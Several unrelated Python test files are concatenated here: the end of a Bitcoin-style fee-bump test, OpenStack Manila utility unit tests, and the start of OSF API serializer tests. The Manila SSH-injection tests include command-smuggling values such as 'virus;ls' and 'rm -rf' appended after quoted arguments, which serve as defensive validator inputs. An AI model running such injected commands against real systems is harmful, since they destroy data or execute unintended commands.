# mempool. this makes it possible to check whether the rbf tx outputs are
# spendable before the rbf tx is confirmed.
block = submit_block_with_tx(rbf_node, rbftx)
rbf_node.abandontransaction(bumpid)
rbf_node.invalidateblock(block.hash)
assert bumpid not in rbf_node.getrawmempool()
assert rbfid in rbf_node.getrawmempool()
# check that outputs from the rbf tx are not spendable before the
# transaction is confirmed, due to the replaced_by_txid check in
# CWallet::AvailableCoins
assert_equal([t for t in rbf_node.listunspent(minconf=0, include_unsafe=False) if t["txid"] == rbfid], [])
# check that the main output from the rbf tx is spendable after confirmed
rbf_node.generate(1)
assert_equal(
sum(1 for t in rbf_node.listunspent(minconf=0, include_unsafe=False)
if t["txid"] == rbfid and t["address"] == rbf_node_address and t["spendable"]), 1)
def test_bumpfee_metadata(rbf_node, dest_address):
rbfid = rbf_node.sendtoaddress(dest_address, Decimal("0.100000"), "comment value", "to value")
bumped_tx = rbf_node.bumpfee(rbfid)
bumped_wtx = rbf_node.gettransaction(bumped_tx["txid"])
assert_equal(bumped_wtx["comment"], "comment value")
assert_equal(bumped_wtx["to"], "to value")
def test_locked_wallet_fails(rbf_node, dest_address):
rbfid = spend_one_input(rbf_node, dest_address)
rbf_node.walletlock()
assert_raises_jsonrpc(-13, "Please enter the wallet passphrase with walletpassphrase first.",
rbf_node.bumpfee, rbfid)
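# Helper: spend a single 0.1 GAME wallet UTXO with a BIP 125 opt-in sequence number,
# sending 0.05 to dest_address and 0.049 to a fresh change address (0.001 fee).
# Returns the txid of the broadcast transaction.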
def spend_one_input(node, dest_address):
tx_input = dict(
sequence=BIP125_SEQUENCE_NUMBER, **next(u for u in node.listunspent() if u["amount"] == Decimal("0.100000")))
rawtx = node.createrawtransaction(
[tx_input], {dest_address: Decimal("0.050000"),
node.getrawchangeaddress(): Decimal("0.049000")})
signedtx = node.signrawtransaction(rawtx)
txid = node.sendrawtransaction(signedtx["hex"])
return txid
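# Helper: build a block on top of the current tip containing only a coinbase and the
# given raw transaction, submit it, and return the block object (so callers can later
# invalidate it).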
def submit_block_with_tx(node, tx):
ctx = CTransaction()
ctx.deserialize(io.BytesIO(hex_str_to_bytes(tx)))
tip = node.getbestblockhash()
height = node.getblockcount() + 1
block_time = node.getblockheader(tip)["mediantime"] + 1
block = blocktools.create_block(int(tip, 16), blocktools.create_coinbase(height), block_time)
block.vtx.append(ctx)
block.rehash()
block.hashMerkleRoot = block.calc_merkle_root()
block.solve()
node.submitblock(bytes_to_hex_str(block.serialize(True)))
return block
if __name__ == "__main__":
BumpFeeTest().main()
|
|
# Copyright 2011 Justin Santa Barbara
# Copyright 2014 NetApp, Inc.
# Copyright 2014 Mirantis, Inc.
#
# Licensed under the Apache License, Version 2.0 (the "License"); you may
# not use this file except in compliance with the License. You may obtain
# a copy of the License at
#
# http://www.apache.org/licenses/LICENSE-2.0
#
# Unless required by applicable law or agreed to in writing, software
# distributed under the License is distributed on an "AS IS" BASIS, WITHOUT
# WARRANTIES OR CONDITIONS OF ANY KIND, either express or implied. See the
# License for the specific language governing permissions and limitations
# under the License.
import datetime
import errno
import os
import os.path
import socket
import tempfile
import time
import uuid
import ddt
import mock
from oslo_config import cfg
from oslo_utils import timeutils
import paramiko
from six.moves import builtins
import manila
from manila import exception
from manila import test
from manila import utils
CONF = cfg.CONF
class GetFromPathTestCase(test.TestCase):
def test_tolerates_nones(self):
f = utils.get_from_path
input = []
self.assertEqual([], f(input, "a"))
self.assertEqual([], f(input, "a/b"))
self.assertEqual([], f(input, "a/b/c"))
input = [None]
self.assertEqual([], f(input, "a"))
self.assertEqual([], f(input, "a/b"))
self.assertEqual([], f(input, "a/b/c"))
input = [{'a': None}]
self.assertEqual([], f(input, "a"))
self.assertEqual([], f(input, "a/b"))
self.assertEqual([], f(input, "a/b/c"))
input = [{'a': {'b': None}}]
self.assertEqual([{'b': None}], f(input, "a"))
self.assertEqual([], f(input, "a/b"))
self.assertEqual([], f(input, "a/b/c"))
input = [{'a': {'b': {'c': None}}}]
self.assertEqual([{'b': {'c': None}}], f(input, "a"))
self.assertEqual([{'c': None}], f(input, "a/b"))
self.assertEqual([], f(input, "a/b/c"))
input = [{'a': {'b': {'c': None}}}, {'a': None}]
self.assertEqual([{'b': {'c': None}}], f(input, "a"))
self.assertEqual([{'c': None}], f(input, "a/b"))
self.assertEqual([], f(input, "a/b/c"))
input = [{'a': {'b': {'c': None}}}, {'a': {'b': None}}]
self.assertEqual([{'b': {'c': None}}, {'b': None}], f(input, "a"))
self.assertEqual([{'c': None}], f(input, "a/b"))
self.assertEqual([], f(input, "a/b/c"))
def test_does_select(self):
f = utils.get_from_path
input = [{'a': 'a_1'}]
self.assertEqual(['a_1'], f(input, "a"))
self.assertEqual([], f(input, "a/b"))
self.assertEqual([], f(input, "a/b/c"))
input = [{'a': {'b': 'b_1'}}]
self.assertEqual([{'b': 'b_1'}], f(input, "a"))
self.assertEqual(['b_1'], f(input, "a/b"))
self.assertEqual([], f(input, "a/b/c"))
input = [{'a': {'b': {'c': 'c_1'}}}]
self.assertEqual([{'b': {'c': 'c_1'}}], f(input, "a"))
self.assertEqual([{'c': 'c_1'}], f(input, "a/b"))
self.assertEqual(['c_1'], f(input, "a/b/c"))
input = [{'a': {'b': {'c': 'c_1'}}}, {'a': None}]
self.assertEqual([{'b': {'c': 'c_1'}}], f(input, "a"))
self.assertEqual([{'c': 'c_1'}], f(input, "a/b"))
self.assertEqual(['c_1'], f(input, "a/b/c"))
input = [{'a': {'b': {'c': 'c_1'}}},
{'a': {'b': None}}]
self.assertEqual([{'b': {'c': 'c_1'}}, {'b': None}], f(input, "a"))
self.assertEqual([{'c': 'c_1'}], f(input, "a/b"))
self.assertEqual(['c_1'], f(input, "a/b/c"))
input = [{'a': {'b': {'c': 'c_1'}}},
{'a': {'b': {'c': 'c_2'}}}]
self.assertEqual([{'b': {'c': 'c_1'}}, {'b': {'c': 'c_2'}}],
f(input, "a"))
self.assertEqual([{'c': 'c_1'}, {'c': 'c_2'}], f(input, "a/b"))
self.assertEqual(['c_1', 'c_2'], f(input, "a/b/c"))
self.assertEqual([], f(input, "a/b/c/d"))
self.assertEqual([], f(input, "c/a/b/d"))
self.assertEqual([], f(input, "i/r/t"))
def test_flattens_lists(self):
f = utils.get_from_path
input = [{'a': [1, 2, 3]}]
self.assertEqual([1, 2, 3], f(input, "a"))
self.assertEqual([], f(input, "a/b"))
self.assertEqual([], f(input, "a/b/c"))
input = [{'a': {'b': [1, 2, 3]}}]
self.assertEqual([{'b': [1, 2, 3]}], f(input, "a"))
self.assertEqual([1, 2, 3], f(input, "a/b"))
self.assertEqual([], f(input, "a/b/c"))
input = [{'a': {'b': [1, 2, 3]}}, {'a': {'b': [4, 5, 6]}}]
self.assertEqual([1, 2, 3, 4, 5, 6], f(input, "a/b"))
self.assertEqual([], f(input, "a/b/c"))
input = [{'a': [{'b': [1, 2, 3]}, {'b': [4, 5, 6]}]}]
self.assertEqual([1, 2, 3, 4, 5, 6], f(input, "a/b"))
self.assertEqual([], f(input, "a/b/c"))
input = [{'a': [1, 2, {'b': 'b_1'}]}]
self.assertEqual([1, 2, {'b': 'b_1'}], f(input, "a"))
self.assertEqual(['b_1'], f(input, "a/b"))
def test_bad_xpath(self):
f = utils.get_from_path
self.assertRaises(exception.Error, f, [], None)
self.assertRaises(exception.Error, f, [], "")
self.assertRaises(exception.Error, f, [], "/")
self.assertRaises(exception.Error, f, [], "/a")
self.assertRaises(exception.Error, f, [], "/a/")
self.assertRaises(exception.Error, f, [], "//")
self.assertRaises(exception.Error, f, [], "//a")
self.assertRaises(exception.Error, f, [], "a//a")
self.assertRaises(exception.Error, f, [], "a//a/")
self.assertRaises(exception.Error, f, [], "a/a/")
def test_real_failure1(self):
# Real world failure case...
# We weren't coping when the input was a Dictionary instead of a List
# This led to test_accepts_dictionaries
f = utils.get_from_path
inst = {'fixed_ip': {'floating_ips': [{'address': '1.2.3.4'}],
'address': '192.168.0.3'},
'hostname': ''}
private_ips = f(inst, 'fixed_ip/address')
public_ips = f(inst, 'fixed_ip/floating_ips/address')
self.assertEqual(['192.168.0.3'], private_ips)
self.assertEqual(['1.2.3.4'], public_ips)
def test_accepts_dictionaries(self):
f = utils.get_from_path
input = {'a': [1, 2, 3]}
self.assertEqual([1, 2, 3], f(input, "a"))
self.assertEqual([], f(input, "a/b"))
self.assertEqual([], f(input, "a/b/c"))
input = {'a': {'b': [1, 2, 3]}}
self.assertEqual([{'b': [1, 2, 3]}], f(input, "a"))
self.assertEqual([1, 2, 3], f(input, "a/b"))
self.assertEqual([], f(input, "a/b/c"))
input = {'a': [{'b': [1, 2, 3]}, {'b': [4, 5, 6]}]}
self.assertEqual([1, 2, 3, 4, 5, 6], f(input, "a/b"))
self.assertEqual([], f(input, "a/b/c"))
input = {'a': [1, 2, {'b': 'b_1'}]}
self.assertEqual([1, 2, {'b': 'b_1'}], f(input, "a"))
self.assertEqual(['b_1'], f(input, "a/b"))
@ddt.ddt
class GenericUtilsTestCase(test.TestCase):
def test_read_cached_file(self):
cache_data = {"data": 1123, "mtime": 1}
with mock.patch.object(os.path, "getmtime", mock.Mock(return_value=1)):
data = utils.read_cached_file("/this/is/a/fake", cache_data)
self.assertEqual(cache_data["data"], data)
os.path.getmtime.assert_called_once_with("/this/is/a/fake")
def test_read_modified_cached_file(self):
with mock.patch.object(os.path, "getmtime", mock.Mock(return_value=2)):
fake_contents = "lorem ipsum"
fake_file = mock.Mock()
fake_file.read = mock.Mock(return_value=fake_contents)
fake_context_manager = mock.Mock()
fake_context_manager.__enter__ = mock.Mock(return_value=fake_file)
fake_context_manager.__exit__ = mock.Mock()
with mock.patch.object(
builtins, 'open',
mock.Mock(return_value=fake_context_manager)):
cache_data = {"data": 1123, "mtime": 1}
self.reload_called = False
def test_reload(reloaded_data):
self.assertEqual(reloaded_data, fake_contents)
self.reload_called = True
data = utils.read_cached_file("/this/is/a/fake",
cache_data,
reload_func=test_reload)
self.assertEqual(data, fake_contents)
self.assertTrue(self.reload_called)
fake_file.read.assert_called_once_with()
fake_context_manager.__enter__.assert_any_call()
builtins.open.assert_called_once_with("/this/is/a/fake")
os.path.getmtime.assert_called_once_with("/this/is/a/fake")
def test_read_file_as_root(self):
def fake_execute(*args, **kwargs):
if args[1] == 'bad':
raise exception.ProcessExecutionError
return 'fakecontents', None
self.mock_object(utils, 'execute', fake_execute)
contents = utils.read_file_as_root('good')
self.assertEqual(contents, 'fakecontents')
self.assertRaises(exception.FileNotFound,
utils.read_file_as_root, 'bad')
def test_temporary_chown(self):
def fake_execute(*args, **kwargs):
if args[0] == 'chown':
fake_execute.uid = args[1]
self.mock_object(utils, 'execute', fake_execute)
with tempfile.NamedTemporaryFile() as f:
with utils.temporary_chown(f.name, owner_uid=2):
self.assertEqual(fake_execute.uid, 2)
self.assertEqual(fake_execute.uid, os.getuid())
def test_service_is_up(self):
fts_func = datetime.datetime.fromtimestamp
fake_now = 1000
down_time = 5
self.flags(service_down_time=down_time)
with mock.patch.object(timeutils, 'utcnow',
mock.Mock(return_value=fts_func(fake_now))):
# Up (equal)
service = {'updated_at': fts_func(fake_now - down_time),
'created_at': fts_func(fake_now - down_time)}
result = utils.service_is_up(service)
self.assertTrue(result)
timeutils.utcnow.assert_called_once_with()
with mock.patch.object(timeutils, 'utcnow',
mock.Mock(return_value=fts_func(fake_now))):
# Up
service = {'updated_at': fts_func(fake_now - down_time + 1),
'created_at': fts_func(fake_now - down_time + 1)}
result = utils.service_is_up(service)
self.assertTrue(result)
timeutils.utcnow.assert_called_once_with()
with mock.patch.object(timeutils, 'utcnow',
mock.Mock(return_value=fts_func(fake_now))):
# Down
service = {'updated_at': fts_func(fake_now - down_time - 1),
'created_at': fts_func(fake_now - down_time - 1)}
result = utils.service_is_up(service)
self.assertFalse(result)
timeutils.utcnow.assert_called_once_with()
def test_is_ipv6_configured0(self):
fake_fd = mock.Mock()
fake_fd.read.return_value = 'test'
with mock.patch('six.moves.builtins.open',
mock.Mock(return_value=fake_fd)) as open:
self.assertTrue(utils.is_ipv6_configured())
open.assert_called_once_with('/proc/net/if_inet6')
fake_fd.read.assert_called_once_with(32)
def test_is_ipv6_configured1(self):
fake_fd = mock.Mock()
fake_fd.read.return_value = ''
with mock.patch(
'six.moves.builtins.open', mock.Mock(return_value=fake_fd)):
self.assertFalse(utils.is_ipv6_configured())
def test_is_ipv6_configured2(self):
with mock.patch('six.moves.builtins.open',
mock.Mock(side_effect=IOError(
errno.ENOENT, 'Fake no such file error.'))):
self.assertFalse(utils.is_ipv6_configured())
def test_is_ipv6_configured3(self):
with mock.patch('six.moves.builtins.open',
mock.Mock(side_effect=IOError(
                            errno.EPERM, 'Fake permission denied error.'))):
self.assertRaises(IOError, utils.is_ipv6_configured)
def test_is_eventlet_bug105(self):
fake_dns = mock.Mock()
fake_dns.getaddrinfo.side_effect = socket.gaierror(errno.EBADF)
with mock.patch.dict('sys.modules', {
'eventlet.support.greendns': fake_dns}):
self.assertTrue(utils.is_eventlet_bug105())
self.assertTrue(fake_dns.getaddrinfo.called)
def test_is_eventlet_bug105_neg(self):
fake_dns = mock.Mock()
fake_dns.getaddrinfo.return_value = [
(socket.AF_INET6, socket.SOCK_STREAM, 0, '', (u'127.0.0.1', 80)),
]
with mock.patch.dict('sys.modules', {
'eventlet.support.greendns': fake_dns}):
self.assertFalse(utils.is_eventlet_bug105())
fake_dns.getaddrinfo.assert_called_once_with('::1', 80)
@ddt.data(['ssh', '-D', 'my_name@name_of_remote_computer'],
['echo', '"quoted arg with space"'],
['echo', "'quoted arg with space'"])
def test_check_ssh_injection(self, cmd):
cmd_list = cmd
self.assertIsNone(utils.check_ssh_injection(cmd_list))
@ddt.data(['ssh', 'my_name@ name_of_remote_computer'],
['||', 'my_name@name_of_remote_computer'],
['cmd', 'virus;ls'],
['cmd', '"arg\"withunescaped"'],
['cmd', 'virus;"quoted argument"'],
['echo', '"quoted argument";rm -rf'],
['echo', "'quoted argument `rm -rf`'"],
['echo', '"quoted";virus;"quoted"'],
['echo', '"quoted";virus;\'quoted\''])
def test_check_ssh_injection_on_error0(self, cmd):
self.assertRaises(exception.SSHInjectionThreat,
utils.check_ssh_injection, cmd)
class MonkeyPatchTestCase(test.TestCase):
"""Unit test for utils.monkey_patch()."""
def setUp(self):
super(MonkeyPatchTestCase, self).setUp()
self.example_package = 'manila.tests.monkey_patch_example.'
self.flags(
monkey_patch=True,
monkey_patch_modules=[self.example_package + 'example_a' + ':'
+ self.example_package
+ 'example_decorator'])
def test_monkey_patch(self):
utils.monkey_patch()
manila.tests.monkey_patch_example.CALLED_FUNCTION = []
from manila.tests.monkey_patch_example import example_a
from manila.tests.monkey_patch_example import example_b
self.assertEqual('Example function', example_a.example_function_a())
exampleA = example_a.ExampleClassA()
exampleA.example_method()
ret_a = exampleA.example_method_add(3, 5)
self.assertEqual(ret_a, 8)
self.assertEqual('Example function', example_b.example_function_b())
exampleB = example_b.ExampleClassB()
exampleB.example_method()
ret_b = exampleB.example_method_add(3, 5)
self.assertEqual(ret_b, 8)
package_a = self.example_package + 'example_a.'
self.assertTrue(package_a + 'example_function_a'
in manila.tests.monkey_patch_example.CALLED_FUNCTION)
self.assertTrue(package_a + 'ExampleClassA.example_method'
in manila.tests.monkey_patch_example.CALLED_FUNCTION)
self.assertTrue(package_a + 'ExampleClassA.example_method_add'
in manila.tests.monkey_patch_example.CALLED_FUNCTION)
package_b = self.example_package + 'example_b.'
self.assertFalse(package_b + 'example_function_b'
in manila.tests.monkey_patch_example.CALLED_FUNCTION)
self.assertFalse(package_b + 'ExampleClassB.example_method'
in manila.tests.monkey_patch_example.CALLED_FUNCTION)
self.assertFalse(package_b + 'ExampleClassB.example_method_add'
in manila.tests.monkey_patch_example.CALLED_FUNCTION)
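# Minimal paramiko stand-ins for SSHPoolTestCase below: FakeSSHClient mimics just
# enough of paramiko.SSHClient (a unique id per instance, no-op connect/close), and
# FakeTransport/FakeSock cover the is_active/set_keepalive/settimeout surface that
# the pool is expected to touch when checking connection health.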
class FakeSSHClient(object):
def __init__(self):
self.id = uuid.uuid4()
self.transport = FakeTransport()
def set_missing_host_key_policy(self, policy):
pass
def connect(self, ip, port=22, username=None, password=None,
key_filename=None, look_for_keys=None, timeout=10):
pass
def get_transport(self):
return self.transport
def close(self):
pass
def __call__(self, *args, **kwargs):
pass
class FakeSock(object):
def settimeout(self, timeout):
pass
class FakeTransport(object):
def __init__(self):
self.active = True
self.sock = FakeSock()
def set_keepalive(self, timeout):
pass
def is_active(self):
return self.active
class SSHPoolTestCase(test.TestCase):
"""Unit test for SSH Connection Pool."""
def test_single_ssh_connect(self):
with mock.patch.object(paramiko, "SSHClient",
mock.Mock(return_value=FakeSSHClient())):
sshpool = utils.SSHPool("127.0.0.1", 22, 10, "test",
password="test", min_size=1, max_size=1)
with sshpool.item() as ssh:
first_id = ssh.id
with sshpool.item() as ssh:
second_id = ssh.id
self.assertEqual(first_id, second_id)
paramiko.SSHClient.assert_called_once_with()
def test_create_ssh_with_password(self):
fake_ssh_client = mock.Mock()
ssh_pool = utils.SSHPool("127.0.0.1", 22, 10, "test",
password="test")
with mock.patch.object(paramiko, "SSHClient",
return_value=fake_ssh_client):
ssh_pool.create()
fake_ssh_client.connect.assert_called_once_with(
"127.0.0.1", port=22, username="test",
password="test", key_filename=None, look_for_keys=False,
timeout=10)
def test_create_ssh_with_key(self):
path_to_private_key = "/fakepath/to/privatekey"
fake_ssh_client = mock.Mock()
        ssh_pool = utils.SSHPool("127.0.0.1", 22, 10, "test",
                                 privatekey=path_to_private_key)
with mock.patch.object(paramiko, "SSHClient",
return_value=fake_ssh_client):
ssh_pool.create()
fake_ssh_client.connect.assert_called_once_with(
"127.0.0.1", port=22, username="test", password=None,
key_filename=path_to_private_key, look_for_keys=False,
timeout=10)
def test_create_ssh_with_nothing(self):
fake_ssh_client = mock.Mock()
ssh_pool = utils.SSHPool("127.0.0.1", 22, 10, "test")
with mock.patch.object(paramiko, "SSHClient",
return_value=fake_ssh_client):
ssh_pool.create()
fake_ssh_client.connect.assert_called_once_with(
"127.0.0.1", port=22, username="test", password=None,
key_filename=None, look_for_keys=True,
timeout=10)
def test_create_ssh_error_connecting(self):
attrs = {'connect.side_effect': paramiko.SSHException, }
fake_ssh_client = mock.Mock(**attrs)
ssh_pool = utils.SSHPool("127.0.0.1", 22, 10, "test")
with mock.patch.object(paramiko, "SSHClient",
return_value=fake_ssh_client):
self.assertRaises(exception.SSHException, ssh_pool.create)
fake_ssh_client.connect.assert_called_once_with(
"127.0.0.1", port=22, username="test", password=None,
key_filename=None, look_for_keys=True,
timeout=10)
    def test_closed_reopened_ssh_connections(self):
with mock.patch.object(paramiko, "SSHClient",
mock.Mock(return_value=FakeSSHClient())):
sshpool = utils.SSHPool("127.0.0.1", 22, 10, "test",
password="test", min_size=1, max_size=2)
with sshpool.item() as ssh:
first_id = ssh.id
with sshpool.item() as ssh:
second_id = ssh.id
# Close the connection and test for a new connection
ssh.get_transport().active = False
self.assertEqual(first_id, second_id)
paramiko.SSHClient.assert_called_once_with()
        # Expect the pool to hand out a new connection since the old transport is inactive
with mock.patch.object(paramiko, "SSHClient",
mock.Mock(return_value=FakeSSHClient())):
with sshpool.item() as ssh:
third_id = ssh.id
self.assertNotEqual(first_id, third_id)
paramiko.SSHClient.assert_called_once_with()
class CidrToNetmaskTestCase(test.TestCase):
"""Unit test for cidr to netmask."""
def test_cidr_to_netmask_01(self):
cidr = '10.0.0.0/0'
expected_netmask = '0.0.0.0'
result = utils.cidr_to_netmask(cidr)
self.assertEqual(expected_netmask, result)
def test_cidr_to_netmask_02(self):
cidr = '10.0.0.0/24'
expected_netmask = '255.255.255.0'
result = utils.cidr_to_netmask(cidr)
self.assertEqual(expected_netmask, result)
def test_cidr_to_netmask_03(self):
cidr = '10.0.0.0/5'
expected_netmask = '248.0.0.0'
result = utils.cidr_to_netmask(cidr)
self.assertEqual(expected_netmask, result)
def test_cidr_to_netmask_04(self):
cidr = '10.0.0.0/32'
expected_netmask = '255.255.255.255'
result = utils.cidr_to_netmask(cidr)
self.assertEqual(expected_netmask, result)
def test_cidr_to_netmask_05(self):
cidr = '10.0.0.1'
expected_netmask = '255.255.255.255'
result = utils.cidr_to_netmask(cidr)
self.assertEqual(expected_netmask, result)
def test_cidr_to_netmask_invalid_01(self):
cidr = '10.0.0.0/33'
self.assertRaises(exception.InvalidInput, utils.cidr_to_netmask, cidr)
def test_cidr_to_netmask_invalid_02(self):
cidr = ''
self.assertRaises(exception.InvalidInput, utils.cidr_to_netmask, cidr)
def test_cidr_to_netmask_invalid_03(self):
cidr = '10.0.0.0/33'
self.assertRaises(exception.InvalidInput, utils.cidr_to_netmask, cidr)
def test_cidr_to_netmask_invalid_04(self):
cidr = '10.0.0.555/33'
self.assertRaises(exception.InvalidInput, utils.cidr_to_netmask, cidr)
@ddt.ddt
class IsValidIPVersion(test.TestCase):
"""Test suite for function 'is_valid_ip_address'."""
@ddt.data('0.0.0.0', '255.255.255.255', '192.168.0.1')
def test_valid_v4(self, addr):
for vers in (4, '4'):
self.assertTrue(utils.is_valid_ip_address(addr, vers))
@ddt.data(
'2001:cdba:0000:0000:0000:0000:3257:9652',
'2001:cdba:0:0:0:0:3257:9652',
'2001:cdba::3257:9652')
def test_valid_v6(self, addr):
for vers in (6, '6'):
self.assertTrue(utils.is_valid_ip_address(addr, vers))
@ddt.data(
{'addr': '1.1.1.1', 'vers': 3},
{'addr': '1.1.1.1', 'vers': 5},
{'addr': '1.1.1.1', 'vers': 7},
{'addr': '2001:cdba::3257:9652', 'vers': '3'},
{'addr': '2001:cdba::3257:9652', 'vers': '5'},
{'addr': '2001:cdba::3257:9652', 'vers': '7'})
@ddt.unpack
def test_provided_invalid_version(self, addr, vers):
self.assertRaises(
exception.ManilaException, utils.is_valid_ip_address, addr, vers)
def test_provided_none_version(self):
self.assertRaises(TypeError, utils.is_valid_ip_address, '', None)
@ddt.data(None, 'fake', '1.1.1.1')
def test_provided_invalid_v6_address(self, addr):
for vers in (6, '6'):
self.assertFalse(utils.is_valid_ip_address(addr, vers))
@ddt.data(None, 'fake', '255.255.255.256', '2001:cdba::3257:9652')
def test_provided_invalid_v4_address(self, addr):
for vers in (4, '4'):
self.assertFalse(utils.is_valid_ip_address(addr, vers))
class Comparable(utils.ComparableMixin):
def __init__(self, value):
self.value = value
def _cmpkey(self):
return self.value
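# Comparable defines only _cmpkey(); all of the rich-comparison operators exercised
# by TestComparableMixin below are inherited from utils.ComparableMixin.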
class TestComparableMixin(test.TestCase):
def setUp(self):
super(TestComparableMixin, self).setUp()
self.one = Comparable(1)
self.two = Comparable(2)
def test_lt(self):
self.assertTrue(self.one < self.two)
self.assertFalse(self.two < self.one)
self.assertFalse(self.one < self.one)
def test_le(self):
self.assertTrue(self.one <= self.two)
self.assertFalse(self.two <= self.one)
self.assertTrue(self.one <= self.one)
def test_eq(self):
self.assertFalse(self.one == self.two)
self.assertFalse(self.two == self.one)
self.assertTrue(self.one == self.one)
def test_ge(self):
self.assertFalse(self.one >= self.two)
self.assertTrue(self.two >= self.one)
self.assertTrue(self.one >= self.one)
def test_gt(self):
self.assertFalse(self.one > self.two)
self.assertTrue(self.two > self.one)
self.assertFalse(self.one > self.one)
def test_ne(self):
self.assertTrue(self.one != self.two)
self.assertTrue(self.two != self.one)
self.assertFalse(self.one != self.one)
def test_compare(self):
self.assertEqual(NotImplemented,
self.one._compare(1, self.one._cmpkey))
class TestRetryDecorator(test.TestCase):
def setUp(self):
super(TestRetryDecorator, self).setUp()
def test_no_retry_required(self):
self.counter = 0
with mock.patch.object(time, 'sleep') as mock_sleep:
@utils.retry(exception.ManilaException,
interval=2,
retries=3,
backoff_rate=2)
def succeeds():
self.counter += 1
return 'success'
ret = succeeds()
self.assertFalse(mock_sleep.called)
self.assertEqual('success', ret)
self.assertEqual(1, self.counter)
def test_no_retry_required_random(self):
self.counter = 0
with mock.patch.object(time, 'sleep') as mock_sleep:
@utils.retry(exception.ManilaException,
interval=2,
retries=3,
backoff_rate=2,
wait_random=True)
def succeeds():
self.counter += 1
return 'success'
ret = succeeds()
self.assertFalse(mock_sleep.called)
self.assertEqual('success', ret)
self.assertEqual(1, self.counter)
def test_retries_once_random(self):
self.counter = 0
interval = 2
backoff_rate = 2
retries = 3
with mock.patch.object(time, 'sleep') as mock_sleep:
@utils.retry(exception.ManilaException,
interval,
retries,
backoff_rate,
wait_random=True)
def fails_once():
self.counter += 1
if self.counter < 2:
raise exception.ManilaException(data='fake')
else:
return 'success'
ret = fails_once()
self.assertEqual('success', ret)
self.assertEqual(2, self.counter)
self.assertEqual(1, mock_sleep.call_count)
self.assertTrue(mock_sleep.called)
def test_retries_once(self):
self.counter = 0
interval = 2
backoff_rate = 2
retries = 3
with mock.patch.object(time, 'sleep') as mock_sleep:
@utils.retry(exception.ManilaException,
interval,
retries,
backoff_rate)
def fails_once():
self.counter += 1
if self.counter < 2:
raise exception.ManilaException(data='fake')
else:
return 'success'
ret = fails_once()
self.assertEqual('success', ret)
self.assertEqual(2, self.counter)
self.assertEqual(1, mock_sleep.call_count)
mock_sleep.assert_called_with(interval * backoff_rate)
def test_limit_is_reached(self):
self.counter = 0
retries = 3
interval = 2
backoff_rate = 4
with mock.patch.object(time, 'sleep') as mock_sleep:
@utils.retry(exception.ManilaException,
interval,
retries,
backoff_rate)
def always_fails():
self.counter += 1
raise exception.ManilaException(data='fake')
self.assertRaises(exception.ManilaException,
always_fails)
self.assertEqual(retries, self.counter)
expected_sleep_arg = []
for i in range(retries):
if i > 0:
interval *= backoff_rate
expected_sleep_arg.append(float(interval))
mock_sleep.assert_has_calls(map(mock.call, expected_sleep_arg))
def test_wrong_exception_no_retry(self):
with mock.patch.object(time, 'sleep') as mock_sleep:
@utils.retry(exception.ManilaException)
def raise_unexpected_error():
raise ValueError("value error")
self.assertRaises(ValueError, raise_unexpected_error)
self.assertFalse(mock_sleep.called)
|
|
# -*- coding: utf-8 -*-
import httplib as http
import importlib
import pkgutil
import pytest
from pytz import utc
from datetime import datetime
import urllib
from nose.tools import * # flake8: noqa
import re
from tests.base import ApiTestCase, DbTestCase
from osf_tests import factories
from tests.utils import make_drf_request_with_version
from api.base.settings.defaults import API_BASE
from api.base.serializers import JSONAPISerializer, BaseAPISerializer
from api.base import serializers as base_serializers
from api.nodes.serializers import NodeSerializer, RelationshipField
from api.waffle.serializers import WaffleSerializer, BaseWaffleSerializer
from api.registrations.serializers import RegistrationSerializer
SER_MODULES = []
for loader, name, _ in pkgutil.iter_modules(['api']):
if name != 'base' and name != 'test':
try:
SER_MODULES.append(
importlib.import_module(
'api.{}.serializers'.format(name)
)
)
except ImportError:
pass
SER_CLASSES = []
for mod in SER_MODULES:
for name, val in mod.__dict__.items():
try:
if issubclass(val, BaseAPISerializer):
if 'JSONAPI' in name or 'BaseAPI' in name:
continue
SER_CLASSES.append(val)
except TypeError:
pass
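# The two loops above import every available api.<app>.serializers module and collect
# the concrete BaseAPISerializer subclasses defined there (skipping the JSONAPI*/BaseAPI*
# base classes) so that TestSerializerMetaType can check each one declares Meta.type_.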
class FakeModel(object):
def null_field(self):
return None
def valued_field(self):
return 'Some'
null = None
foo = 'bar'
pk = '1234'
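# FakeSerializer below exercises LinksField and RelationshipField against FakeModel:
# the '<attr>' placeholders in related_view_kwargs presumably resolve to attributes of
# the serialized object, so '<null>' yields None (and the field is omitted, as
# TestNullLinks verifies) while '<foo>' yields 'bar'.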
class FakeSerializer(base_serializers.JSONAPISerializer):
class Meta:
type_ = 'foos'
links = base_serializers.LinksField({
'null_field': 'null_field',
'valued_field': 'valued_field',
})
null_link_field = base_serializers.RelationshipField(
related_view='nodes:node-detail',
related_view_kwargs={'node_id': '<null>'},
)
valued_link_field = base_serializers.RelationshipField(
related_view='nodes:node-detail',
related_view_kwargs={'node_id': '<foo>'},
)
def null_field(*args, **kwargs):
return None
def valued_field(*args, **kwargs):
return 'http://foo.com'
class TestSerializerMetaType(ApiTestCase):
def test_expected_serializers_have_meta_types(self):
for ser in SER_CLASSES:
assert hasattr(
ser, 'Meta'
), 'Serializer {} has no Meta'.format(ser)
assert hasattr(
ser.Meta, 'type_'
), 'Serializer {} has no Meta.type_'.format(ser)
class TestNodeSerializerAndRegistrationSerializerDifferences(ApiTestCase):
"""
    All fields on the Node Serializer, other than the few we can serialize for withdrawals, must be redeclared on the
    Registration Serializer and wrapped in HideIfWithdrawal.
    HideIfRegistration fields should not be serialized on registrations.
"""
def setUp(self):
super(TestNodeSerializerAndRegistrationSerializerDifferences, self).setUp()
self.node = factories.ProjectFactory(is_public=True)
self.registration = factories.RegistrationFactory(
project=self.node, is_public=True)
self.url = '/{}nodes/{}/'.format(API_BASE, self.node._id)
self.reg_url = '/{}registrations/{}/'.format(
API_BASE, self.registration._id)
def test_registration_serializer(self):
# fields that are visible for withdrawals
visible_on_withdrawals = [
'contributors',
'implicit_contributors',
'date_created',
'date_modified',
'description',
'id',
'links',
'registration',
'title',
'type',
'current_user_can_comment',
'current_user_is_contributor',
'preprint',
'subjects']
# fields that do not appear on registrations
non_registration_fields = ['registrations', 'draft_registrations', 'templated_by_count', 'settings']
for field in NodeSerializer._declared_fields:
assert_in(field, RegistrationSerializer._declared_fields)
reg_field = RegistrationSerializer._declared_fields[field]
if field not in visible_on_withdrawals and field not in non_registration_fields:
assert_true(
isinstance(reg_field, base_serializers.HideIfWithdrawal) or
isinstance(reg_field, base_serializers.ShowIfVersion) or
isinstance(reg_field, base_serializers.ShowIfAdminScopeOrAnonymous)
)
def test_hide_if_registration_fields(self):
node_res = self.app.get(self.url)
node_relationships = node_res.json['data']['relationships']
registration_res = self.app.get(self.reg_url)
